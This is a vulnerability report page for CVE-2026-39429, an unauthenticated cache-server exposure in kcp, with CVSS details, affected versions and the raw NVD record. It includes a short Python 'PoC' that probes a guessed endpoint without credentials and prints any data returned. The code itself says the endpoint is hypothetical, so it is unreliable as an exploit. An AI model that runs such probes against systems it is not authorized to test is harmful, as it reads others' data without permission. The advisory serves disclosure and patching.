Security Vulnerability Report
CVE-2026-39429 CVSS 8.2 HIGH

CVE-2026-39429

Published: 2026-04-08 21:16:59
Last Modified: 2026-04-15 19:15:39

Description

kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.30.3 and 0.29.3, the cache server is directly exposed by the root shard and has no authentication or authorization in place. This allows anyone who can access the root shard to read and write to the cache server. This vulnerability is fixed in 0.30.3 and 0.29.3.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:* - VULNERABLE
kcp < 0.30.3
kcp < 0.29.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# PoC for CVE-2026-39429: Unauthenticated Cache Server Access
# This script attempts to read/write from the exposed cache server without authentication.


def check_vulnerability(target_url):
    """
    Attempts to access the cache server endpoint.
    If the server responds without 401/403, it might be vulnerable.
    """
    # Hypothetical endpoint for cache server based on vulnerability description
    cache_endpoint = f"{target_url}/cache/v1/read"

    try:
        # Attempt to read from cache without headers
        response = requests.get(cache_endpoint, timeout=5)

        if response.status_code == 200:
            print("[+] Potential Vulnerability Detected! Server responded with 200 OK.")
            print(f"[+] Data received: {response.text[:100]}...")
            return True
        elif response.status_code in [401, 403]:
            print("[-] Server requires authentication. Not vulnerable.")
            return False
        else:
            print(f"[?] Unexpected status code: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <http://target_ip:port>")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Checking {target} for CVE-2026-39429...")
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39429", "sourceIdentifier": "[email protected]", "published": "2026-04-08T21:16:59.313", "lastModified": "2026-04-15T19:15:39.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.30.3 and 0.29.3, the cache server is directly exposed by the root shard and has no authentication or authorization in place. This allows anyone who can access the root shard to read and write to the cache server. This vulnerability is fixed in 0.30.3 and 0.29.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-302"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.29.3", "matchCriteriaId": "DFC8494E-4C32-4DC4-9093-197071C3FE3A"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.30.0", "versionEndExcluding": "0.30.3", "matchCriteriaId": "0237B688-7AC2-4DDB-A5E2-D50D6591CF66"}]}]}], "references": [{"url": "https://github.com/kcp-dev/kcp/releases/tag/v0.29.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kcp-dev/kcp/releases/tag/v0.30.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kcp-dev/kcp/security/advisories/GHSA-3j3q-wp9x-585p", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}